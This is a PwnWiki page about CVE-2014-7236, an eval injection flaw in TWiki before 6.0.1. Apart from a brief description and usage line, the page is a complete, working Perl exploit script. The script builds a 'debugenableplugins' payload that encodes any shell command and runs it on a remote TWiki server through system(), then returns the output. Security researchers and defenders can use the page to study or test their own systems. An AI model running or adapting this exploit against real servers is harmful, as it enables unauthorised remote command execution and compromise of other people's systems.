CVE-2014-7236 TWiki before 6.0.1任意perl代碼執行漏洞

From PwnWiki
Revision as of 16:13, 7 April 2021 by Pwnwiki (talk | contribs) (Created page with "==INFO== Eval injection vulnerability in lib/TWiki/Plugins.pm in TWiki before 6.0.1 allows remote attackers to execute arbitrary Perl code via the debugenableplugins parameter...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

INFO

Eval injection vulnerability in lib/TWiki/Plugins.pm in TWiki before 6.0.1 allows remote attackers to execute arbitrary Perl code via the debugenableplugins parameter to do/view/Main/WebHome.

Usage

perl exploit.pl host [cmd]

ex. perl exploit.pl http://127.0.0.1/Main/WebHome "uname -a"

EXP

#!/usr/bin/perl
=cut
TWiki code execution CVE-2014-7236
m0nad <m0nad/at/email.com>
ref: http://seclists.org/fulldisclosure/2014/Oct/44
=cut
use LWP::Simple;
use strict;
use diagnostics;
use warnings;
sub banner
{
	print "[*] TWiki code execution CVE-2014-7236\n";
	print "[*] m0nad <m0nad/at/email.com>\n";
}
sub usage
{
	print "[?] usage: perl $0 <host> [cmd]\n";
	print "[?] ex. perl $0 http://127.0.0.1/Main/WebHome \"uname -a\"\n";
	exit;
}
sub exploit
{
	my ($host, $cmd) = @_;
	$cmd = "echo start_xpl &&" . $cmd . "&& echo end_xpl";
	my $byte =  join('.', map { 'chr('.$_.')' } unpack('C*', $cmd));
	my $payload = "?debugenableplugins=BackupRestorePlugin%3bprint%28%22Content-Type:text/html\\r\\n\\r\\n%22%29%3bprint(system($byte))%3b%3bexit";

	my $res = get $host . $payload;
	print "[-] Exploit Failed\n" and exit unless ($res =~ m/start_xpl\n(.*?)end_xpl/ms);
	print "[+] $1";
}
banner();
my $host = shift || usage();
my $cmd = shift || "echo Vulnerable!";
exploit($host, $cmd);
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2014-7236_TWiki_before_6.0.1任意perl代碼執行漏洞&oldid=1104"